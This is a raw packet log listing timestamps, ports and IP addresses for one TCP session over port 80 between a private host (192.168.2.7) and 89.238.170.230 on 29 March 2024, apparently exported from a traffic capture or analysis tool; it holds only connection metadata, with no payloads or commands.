Mar 29, 2024 14:24:50.231455088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.231472015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.231489897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.231502056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.231522083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.244043112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.244061947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.244095087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.244127989 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.290575981 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.290605068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.290642977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.290733099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.444330931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.444468021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.444506884 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.444562912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.444601059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.444811106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.444859028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.444906950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.444911003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.444947004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.444977999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.445014000 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.458650112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.459645033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.504148006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.504173040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.504261971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.504261971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.667891979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.667912006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.668000937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.668096066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.668152094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.668207884 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.668256044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.668268919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.668304920 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.680859089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.680898905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.680948019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.724150896 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.725585938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.883500099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.883565903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.883651018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.883807898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.883833885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.883852959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.883872032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.885540962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.895550966 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.895581961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.895646095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:50.940088987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:50.940169096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.098258018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.098535061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.098555088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.098609924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.098649025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.099750042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.099780083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.099838018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.109426022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.109448910 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.109522104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.152686119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.152762890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.313035965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.313091040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.313128948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.313165903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.314088106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.314110041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.314130068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.314141035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.314167023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.314177990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.314209938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.323484898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.323533058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.323534012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.323642015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.363527060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.363605976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.526232004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.526304960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.526494980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.526514053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.526544094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.526566982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.526669025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.526684999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.526717901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.526729107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.527023077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.527039051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.527070999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.527081966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.534559965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.534626961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.574548006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.574570894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.574639082 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.750673056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.750827074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.750885010 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.750893116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.750927925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.751249075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.751553059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.751619101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.751658916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.751698971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.751734972 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.751796961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.751838923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.757806063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.757857084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.758258104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.758325100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.794774055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.794822931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.794848919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.794872999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.964101076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.964128971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.964189053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.964385033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.964413881 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.964428902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.964477062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.964526892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.964734077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.964783907 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.964792013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.964834929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.970568895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.970618010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:51.970670938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:51.970719099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.012109995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.012168884 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.012183905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.012209892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.012269974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.012311935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.190500021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.190573931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.190670013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.190682888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.190713882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.190737963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.190891981 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.190939903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.190954924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.190979958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.195555925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.195600033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.195609093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.195640087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.239147902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.239212990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.239243031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.239285946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.239316940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.239372015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.239372969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.239409924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.411583900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.411652088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.411715031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.411761045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.412056923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.412110090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.412163019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.412209988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.415299892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.415347099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.452173948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.452250957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.452267885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.452318907 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.452327967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.452373981 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.452374935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.452419996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.452461958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.452505112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.633332968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.633445978 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.634639978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.634654999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.634684086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.634707928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.635605097 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.635667086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.670197964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.670353889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.670557022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.670609951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.670743942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.670795918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.860510111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.860585928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.861187935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.861263037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.862490892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.862539053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.862591982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.862632036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.898147106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.898175955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.898339033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.898343086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.898343086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.898360014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:52.898384094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:52.898400068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.084212065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.084297895 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.085879087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.085932970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.085999966 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.086040974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.120671034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.120692015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.120704889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.120718002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.120775938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.120819092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.120853901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.120867968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.120879889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.120898962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.120908022 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.120935917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.313313961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.313378096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.315386057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.315435886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.350862980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.350924015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.351577997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.351628065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.351641893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.351660013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.351682901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.351706982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.351722002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.351758957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.351766109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.351804018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.351814985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.351859093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.351862907 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.351901054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.523880005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.523950100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.523953915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.523997068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.525470018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.525516033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.564080954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.564193010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.564459085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.564472914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.564518929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.564637899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.564659119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.564682961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.564708948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.564954996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.564994097 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.565006018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.565030098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.565046072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.565068960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.734975100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.735039949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.736290932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.736340046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.736511946 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.736557007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.774620056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.774689913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.774698019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.774760962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.774761915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.774796963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.774980068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.775029898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.775052071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.775089025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.775110006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.775141954 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.775149107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.775180101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.775201082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.775235891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.939122915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.939209938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.939960957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.940015078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.985167980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.985217094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.985228062 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.985304117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.985307932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.985394001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.985394001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.985435963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.986134052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.986176968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.986243963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.986284971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.986373901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.986413956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.986465931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.986511946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:53.986648083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:53.986689091 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.157186985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.157316923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.202284098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.202316999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.202330112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.202342987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.202461958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.202500105 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.203537941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.203583956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.203630924 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.203645945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:54.203670025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.203685045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:54.203773975 CET	80	49699	89.238.170.230	192.168.2.7
